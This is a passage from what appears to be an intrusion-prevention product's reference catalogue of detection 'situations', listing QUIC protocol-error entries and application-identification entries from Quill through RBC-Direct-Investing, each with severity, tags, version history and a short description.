QUIC_Client-Stream-Data-Blocked

About this situation: QUIC client stream data blocked by flow control
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The flow control limits currently prevent sending data on a QUIC stream from the client to the server.
Back to top

QUIC_Client-Stream-Id-In-Use

About this situation: A QUIC stream ID sent by the client is already in use
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC client was expected to send a previously unused stream ID but the stream ID sent by the client is already in use.
Back to top

QUIC_Client-Stream-Id-Not-Available

About this situation: New QUIC client stream id not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There is no unused QUIC stream ID available to be allocated for a stream from the client to the server.
Back to top

QUIC_Client-Stream-Limit-Exceeded

About this situation: QUIC client has exceeded the streams limit
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The client has opened more QUIC streams than allowed as specified in a MAX_STREAMS frame.
Back to top

QUIC_Client-Stream-Not-Found

About this situation: QUIC client stream not found
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The proper QUIC stream was not found when handling traffic from the client to the server.
Back to top

QUIC_Client-Stream-Send-Closed

About this situation: QUIC client stream send part is closed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Sending data from the client to the server on a QUIC stream failed because the send part of the stream has already been closed.
Back to top

QUIC_Client-Transport-Param-Error

About this situation: Error in QUIC client transport parameters
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when handling the QUIC transport parameters sent by the client.
Back to top

QUIC_Client-Transport-Param-Missing

About this situation: QUIC client required transport parameter missing
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A required parameter is missing in the QUIC transport parameters sent by the client.
Back to top

QUIC_Client-Unrecoverable-Error

About this situation: Unrecoverable error in QUIC client traffic
Context: QUIC
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There was an unrecoverable error in processing QUIC traffic sent by the client. This can be caused by client software that does not actually use the QUIC protocol or does not follow it strictly or by an internal error in the QUIC inspection. The connection cannot be continued; the action for this situation is always Terminate.
Back to top

QUIC_Connection-Discarded-Cannot-Inspect

About this situation: QUIC connection discarded since it cannot be inspected
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Description: TLS inspection has been configured in the engine properties and inspecting the QUIC connection as defined in the rule options requires inspection features that are not supported by the current engine version. Since the "Discard QUIC if inspection not possible" is set to "Yes" (either in the engine properties or in the protocol parameters) the connection is discarded. The client may re-try the connection using TLS over TCP.
Back to top

QUIC_Not-QUIC

About this situation: The connection does not look like using QUIC
Context: QUIC
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1519-5242
Last changed: sgpkg-ips-1519-5242
Description: The connection does not look like using QUIC.
Back to top

QUIC_Protocol-Error

About this situation: QUIC protocol error
Context: QUIC
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The traffic that is expected to be as defined in [RFC 9000] has an error at the protocol level.
Back to top

QUIC_Protocol-Identified

About this situation: QUIC protocol identified
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The traffic is identified as QUIC as defined in [RFC 9000].
Back to top

QUIC_Server-Aead-Limit-Exceeded

About this situation: QUIC server AEAD encryption limit has been exceeded
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC server AEAD encryption limit has been exceeded and updating the keys is no longer possible.
Back to top

QUIC_Server-Connection-Closing

About this situation: QUIC server operation failed due to closing connection
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the server failed because the QUIC connection is closing.
Back to top

QUIC_Server-Connection-Draining

About this situation: QUIC server operation failed due to draining connection
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the server failed because the QUIC connection is draining.
Back to top

QUIC_Server-Connection-Id-Limit-Exceeded

About this situation: QUIC server has exceeded the connection ID limit
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The number of connection IDs sent by the server exceeds the acceptable limit specified in the transport parameters.
Back to top

QUIC_Server-Connection-Id-Not-Available

About this situation: New QUIC server connection id not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There is no unused QUIC connection ID available to be allocated when migrating a connection from the server to the client.
Back to top

QUIC_Server-Crypto-Buffer-Exceeded

About this situation: Buffer for QUIC server CRYPTO frames exceeded
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The amount of handshake data from QUIC CRYPTO frames sent by the server exceeds the reserved buffer space.
Back to top

QUIC_Server-Crypto-Error

About this situation: Cryptographic error on data sent by QUIC server
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A TLS cryptographic operation on data sent by the QUIC server has failed.
Back to top

QUIC_Server-Decrypt-Error

About this situation: QUIC server TLS decrypt error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Doing TLS decrypting on data sent by the QUIC server has failed.
Back to top

QUIC_Server-Drop-Connection

About this situation: Connection dropped due to unspecified error in QUIC server traffic
Context: QUIC
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There was an unspecified error in processing QUIC traffic sent by the server. The error requires the connection to be dropped. This can be caused by server software that does not actually use the QUIC protocol or does not follow it strictly or by an internal error in the QUIC inspection. The connection cannot be continued; the action for this situation is always Terminate.
Back to top

QUIC_Server-Final-Size-Error

About this situation: QUIC server stream final size error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The final size of a QUIC stream is different than what the server announced.
Back to top

QUIC_Server-Flow-Contol-Error

About this situation: QUIC server flow control error has occurred
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC flow control error has occurred in traffic from the server to the client.
Back to top

QUIC_Server-Frame-Encoding-Error

About this situation: QUIC server frame encoding error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC packet sent by the server has an error in the frame encoding.
Back to top

QUIC_Server-Incompatible-Version

About this situation: QUIC server uses an incompatible QUIC version
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC version that the server uses is not compatible with NGFW.
Back to top

QUIC_Server-Invalid-Ack-Frame

About this situation: A QUIC ACK frame sent by the server is not a valid
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC packet sent by the server contains an invalid ACK frame.
Back to top

QUIC_Server-Invalid-Operation

About this situation: QUIC server operation not allowed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the server is not allowed at the current state of the QUIC connection.
Back to top

QUIC_Server-Invalid-Packet

About this situation: A packet sent by the server is not a valid QUIC packet
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A packet sent by the server is not a valid QUIC packet as defined in [RFC 9000].
Back to top

QUIC_Server-Invalid-Stream-Operation

About this situation: QUIC server stream operation not allowed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the server is not allowed at the current state of the QUIC stream.
Back to top

QUIC_Server-Invalid-Transport-Param

About this situation: QUIC server transport parameter is not valid
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC transport parameter sent by the server is not valid.
Back to top

QUIC_Server-Packet-Error

About this situation: QUIC packet sent by the server could not be processed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when handling a QUIC packet sent by the server.
Back to top

QUIC_Server-Path-Probe-Error

About this situation: QUIC server path probe error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when probing the QUIC path from the server to the client.
Back to top

QUIC_Server-Path-Validation-Error

About this situation: QUIC server path validation error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when validating the QUIC path from the server to the client.
Back to top

QUIC_Server-Pkt-Num-Not-Available

About this situation: QUIC packet number not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Sending a QUIC packet from the server to the client failed because a packet number can't be allocated.
Back to top

QUIC_Server-Protocol-Error

About this situation: Generic QUIC server protocol error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Traffic sent by the server has led to a violation of the QUIC protocol as defined in [RFC 9000].
Back to top

QUIC_Server-Stream-Data-Blocked

About this situation: QUIC server stream data blocked by flow control
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The flow control limits currently prevent sending data on a QUIC stream from the server to the client.
Back to top

QUIC_Server-Stream-Id-In-Use

About this situation: A QUIC stream ID sent by the server is already in use
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC server was expected to send a previously unused stream ID but the stream ID sent by the server is already in use.
Back to top

QUIC_Server-Stream-Id-Not-Available

About this situation: New QUIC server stream id not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There is no unused QUIC stream ID available to be allocated for a stream from the server to the client.
Back to top

QUIC_Server-Stream-Limit-Exceeded

About this situation: QUIC server has exceeded the stream limit
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The server has opened more QUIC streams than allowed as specified in a MAX_STREAMS frame.
Back to top

QUIC_Server-Stream-Not-Found

About this situation: QUIC server stream not found
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The proper QUIC stream was not found when handling traffic from the server to the client.
Back to top

QUIC_Server-Stream-Send-Closed

About this situation: QUIC server stream send part is closed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Sending data from the server to the client on a QUIC stream failed because the send part of the stream has already been closed.
Back to top

QUIC_Server-Transport-Param-Error

About this situation: Error in QUIC server transport parameters
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when handling the QUIC transport parameters sent by the server.
Back to top

QUIC_Server-Transport-Param-Missing

About this situation: QUIC server required transport parameter missing
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A required parameter is missing in the QUIC transport parameters sent by the server.
Back to top

QUIC_Server-Unrecoverable-Error

About this situation: Unrecoverable error in QUIC server traffic
Context: QUIC
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There was an unrecoverable error in processing QUIC traffic sent by the server. This can be caused by server software that does not actually use the QUIC protocol or does not follow it strictly or by an internal error in the QUIC inspection. The connection cannot be continued; the action for this situation is always Terminate.
Back to top

Quill

About this situation: Application Quill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quill provides technology, cleaning and breakroom supplies, business furniture, safety products and general office supplies for customers.
Back to top

Quinte-Computer-Services

About this situation: Application Quinte-Computer-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quinte Computer Services Ltd. provides Enterprise and e-Business solutions for small to medium sized companies.
Back to top

QuintilesIMS

About this situation: Application QuintilesIMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuintilesIMS develops innovative web-based software solutions that enable life sciences organizations to improve clinical trial performance.
Back to top

Quintiq

About this situation: Application Quintiq detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quintiq focuses on providing planning, scheduling and supply chain optimization software solutions for markets.
Back to top

Quip

About this situation: Application Quip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quip is a modern word processor that enables you to create documents on any device - phones, tablets and the desktop.
Back to top

Quiz-Maker

About this situation: Application Quiz-Maker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quiz Maker lets you to create an Online Quiz in Seconds.
Back to top

Quizlet

About this situation: Quizlet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1764-5242
Description: Quizlet usage detected. Quizlet is a tool to create automatic quiz tests.
Back to top

Quora

About this situation: Quora usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1636-5242
Description: Quora is a question and answers website. Its members contribute to answering questions as well as posting new questions and upvoting answers. The website is available using the URL https://www.quora.com/.
Back to top

Quote-Manager

About this situation: Application Quote-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quote Manager (Online Quote Builder) is web-based sales quotation software allows businesses to automate their sales process via instant, automatic sales quotes and online ordering capability.
Back to top

Quote-Roller

About this situation: Application Quote-Roller detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuoteRoller is business proposal software that helps to create professional proposals that save you time and money.
Back to top

Qvod

About this situation: Qvod usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-629-5211
Description: Qvod is a media streaming application. Files on QVOD network are distributely located. A Qvod client (the player) connects to a tracker server to get a list of peers that have a portion or whole copy of the file, then make request to download the file from the peers.
Back to top

Qwaya

About this situation: Application Qwaya detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qwaya optimizes your Facebook marketing and saves time with a powerful tool
Back to top

Qwilr

About this situation: Application Qwilr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qwilr operates an online platform that allows individuals and businesses to create, manage, and share Web documents
Back to top

Qyule

About this situation: Qyule usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A Chinese entertainment portal
Back to top

Qzone

About this situation: Qzone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1151-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

R.O.EYE

About this situation: R.O.EYE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Description: R.O.EYE is an independent performace marketing agency.
Back to top

RAAS

About this situation: Application RAAS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RAAS
Back to top

Racked

About this situation: Racked usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: Racked usage detected. Racked is a fashion and style magazine by Vox Media.
Back to top

Rackspace

About this situation: Application Rackspace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Rackspace Cloud is a set of cloud computing products and services built on a utility computing basis from the US-based company Rackspace. Offerings include web application hosting or platform as a service
Back to top

Radgost

About this situation: Application Radgost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Radgost is a software company focusing on ERP-CRM products.
Back to top

Radian6

About this situation: Application Radian6 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Radian6 help Identify and analyze conversations about your company, products and competitors with the leading social media monitoring and engagement tools. Route important insights to sales, customer service, PR and community managers for outreach and engagement.
Back to top

Radio-Nova

About this situation: Radio Nova usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-793-5211
Description: Radio Nova is an Internet radio service.
Back to top

Radio-NRJ

About this situation: Radio NRJ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-628-5211
Description: Radio NRJ is an Internet radio service.
Back to top

Radio-Rock

About this situation: Radio Rock usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-720-5211
Description: Radio Rock is an Internet radio service.
Back to top

Radius

About this situation: Radius traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Description: RADIUS is used for centralized authentication, authorization and accounting.
Back to top

Radiusim

About this situation: radiusIM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service supports MSN, AIM/ICQ, Yahoo, and GTalk/Jabber.
Back to top

RADIX-IDC

About this situation: Application RADIX-IDC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Integrated OSS suite of solutions includes modules to handle order management, CRM, mediation, usage rating, management reporting, convergent billing, accounts receivable, customer/e-care portals and electronic bonding.
Back to top

Radmin

About this situation: Application Radmin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Radmin is remote access software solutions designed for Windows.
Back to top

Radware

About this situation: Application Radware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Radware is application delivery and cyber security solutions for virtual, cloud and software defined data centers.
Back to top

Rafter-Cloud-Stores

About this situation: Application Rafter-Cloud-Stores detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rafter Cloud Stores helps you manage your textbook sales online with tools for pricing, reporting and automated email reminders.
Back to top

Rainforest-QA

About this situation: Application Rainforest-QA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rainforest is the Continuous QA Platform designed for Agile and Continuous Integration Continuous Delivery. With the Rainforest API, engineering, product and quality teams can design without code, run tests on demand, and get results in less than 30 minutes.
Back to top

RainKing

About this situation: Application RainKing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RainKing helps sales and marketing professionals in the technology and marketing industries find great prospects, qualify leads, map complex management structures, and score every enterprise IT manager in North America based on how likely they are to buy your product or service.
Back to top

Rainmaker

About this situation: Application Rainmaker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rainmaker - Complete Website Solution for Building Your Online Marketing and Sales Platform
Back to top

RainWorx-Software

About this situation: Application RainWorx-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RainWorx Software is an auction software and ecommerce solutions.
Back to top

Rakuten

About this situation: Application Rakuten detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rakuten is an online shop, electronic commerce and Internet company.
Back to top

Rally

About this situation: Rally usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Description: Rally is an Application Life-cycle Management software suite developed by Rally Software Development Corp. The application is available as a Software-as-a-Service or on-premises installation.
Back to top

Ramco-Systems

About this situation: Application Ramco-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ramco Systems offers enterprise solutions across cloud, mobile and tablets that render transformation of business in real-time.
Back to top

Ramp-Systems

About this situation: Application Ramp-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ramp Systems is an enterprise software and services company that provides solutions to the logistics industry. It offers software and services for warehouse management, supply chain execution, EDI, eCommerce and application integration.
Back to top

Rand

About this situation: Application Rand detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rand is provider of technology solutions and professional services to the engineering community, targeting organizations in the building, infrastructure and manufacturing industries.
Back to top

Rapid-Billing

About this situation: Application Rapid-Billing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rapid-Billing is reliable, flexible and scalable billing software.
Back to top

Rapid-Modeling-Corporation

About this situation: Application Rapid-Modeling-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rapid Modeling Corporation is a simulation, modeling, and optimization consulting firm that specializes in hospital and factory Industrial engineering software and services.
Back to top

Rapid7

About this situation: Application Rapid7 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rapid7 is a provider of security data and analytics solutions that enable organizations to implement an active, analytics-driven approach to cyber security.
Back to top

RapidShare

About this situation: RapidShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-628-5211
Description: RapidShare is a one-click hosting service that offers both free and commercial services.
Back to top

RapidSpike

About this situation: Application RapidSpike detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RapidSpike is a self service website performance platform helping organisations across the globe monitor their digital assets.
Back to top

RatesMate

About this situation: Application RatesMate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RatesMate.com.au is an online quick access library for tax, superannuation and pension rates, dates, thresholds, concessions and rules
Back to top

RationalPlan

About this situation: Application RationalPlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RationalPlan is a project management software suite.
Back to top

Rationalsurvey

About this situation: RationalSurvey usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: The smart and simple way to create, manage and distribute questionnaire based surveys and polls online.
Back to top

Raven

About this situation: Application Raven detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Raven is an online marketing reporting software smart Internet marketers use daily. Access marketing tools including SEO, social media, content marketing and PPC tools.
Back to top

Ravencloud

About this situation: RavenCloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to generate business process diagrams from plain English text; they can write their own process narratives or select from a library of template examples.
Back to top

Ravox

About this situation: Application Ravox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ravox is a distributed social ecommerce platform giving sellers, business owners and vendors Facebook stores, marketplace access, and connections to social affiliates.
Back to top

Raygun

About this situation: Application Raygun detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Raygun is error tracking and crash reporting tool to help developers discover and resolve software bugs faster.
Back to top

Raynet

About this situation: Application Raynet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Raynet simplify your daily agenda, keep track of everything that's going on, and boost up your business.
Back to top

Razer Synapse

About this situation: Endpoint Context Agent based Razer Synapse detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Razer Synapse endpoint application has been detected. Razer Synapse is a cloud-based driver software which can be used for configuring hardware produced by Razer Inc. Razer Inc. produces hardware specially designed for maximized gaming experience.
Back to top

Razorsight

About this situation: Application Razorsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Razorsight cloud-based predictive analytics software. Razorsight delivers predictive insights to proactively and precisely target customer acquisition and retention and increase CLV.
Back to top

RazorSync

About this situation: Application RazorSync detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With Razorsync's web and mobile application, you can automate your daily tasks, schedule jobs on the fly, get directions to job sites, and communicate effortlessly with customers and field workers - all from your smartphone, tablet or computer browser.
Back to top

RBackup

About this situation: Application RBackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Remote Backup Systems develops software and services for Online Backup Services who provide internet-based online backups.
Back to top

RBC-Direct-Investing

About this situation: Application RBC-Direct-Investing detected
Context: Application Context
